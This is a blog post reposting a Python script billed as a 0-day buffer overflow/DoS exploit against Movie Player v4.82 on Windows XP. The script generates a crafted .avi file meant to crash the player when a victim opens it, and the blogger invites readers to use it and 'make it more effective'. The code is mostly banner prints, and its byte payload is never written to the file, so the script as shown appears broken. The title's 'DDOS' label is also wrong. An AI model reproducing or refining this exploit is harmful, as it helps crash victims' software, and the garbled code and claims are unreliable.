Movie Player Buffer Overflow DDOS attack - Exploit source code

Hi folks while surfing internet I came across an interesting exploit for buffer overflow attack which targets the memory vulnerability of Movie Player and sometimes it also works cool on windows media player.
This exploit can be used succefully to perform DOS attack and can cause the application to crash.

After executing the exploit whenever victim open the infected file the application will crash immediately
Here is the exploit coded by ^Xecuti0N3r & d3M0l!tioN3r

#(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit
#(+)Software Link:
#(+)Software : Movie Player
#(+)Version : v4.82
#(+)Tested On : WIN-XP SP3
#(+) Date : 31.03.2011
#(+) Hour : 3:37 PM
#Similar Bug was found by cr4wl3r in MediaPlayer Classic
print " _______________________________________________________________________";
print "(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit";
print "(+) Software Link:";
print "(+) Software : Movie Player";
print "(+) Version : v4.82";
print "(+) Tested On : WIN-XP SP3";
print "(+) Date : 31.03.2011";
print "(+) Hour : 13:37 PM ";
print "____________________________________________________________________\n ";
import time
time.sleep (2);
print "\nGenerating the exploit file !!!";
time.sleep (2);
print "\n\nMoviePlayerExploit.avi file generated!!";
time.sleep (2);
ExploitLocation = "E:\\MoviePlayerExploit.avi"
f = open(ExploitLocation, "wb")
memoryloc ='\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00';
print "\n\n(+) Done!\n";
print "(+) Now Just open MoviePlayerExploit.avi with Movie Player and Kaboooommm !! ;) \n";
print "(+) Most of the times there is a crash\n whenever you open the folder where the MoviePlayerExploit.avi is stored :D \n";
time.sleep (2);
time.sleep (1);
print "\n\n\n########################################################################\n (+)Exploit Coded by: ^Xecuti0N3r & d3M0l!tioN3r \n";
print "(+)^Xecuti0N3r: E-mail \n";
print "(+)d3M0l!tioN3r: E-mail \n";
print "(+)Special Thanks to: MaxCaps & aNnIh!LatioN3r \n";
print "########################################################################\n\n";
time.sleep (4);

This exploit is written in python. You need python compiler to launch the exploit. Test its working on virtual machine. Since you have the code then use it in your own way and make it more effective. Take a look at How to Compile a Python Program

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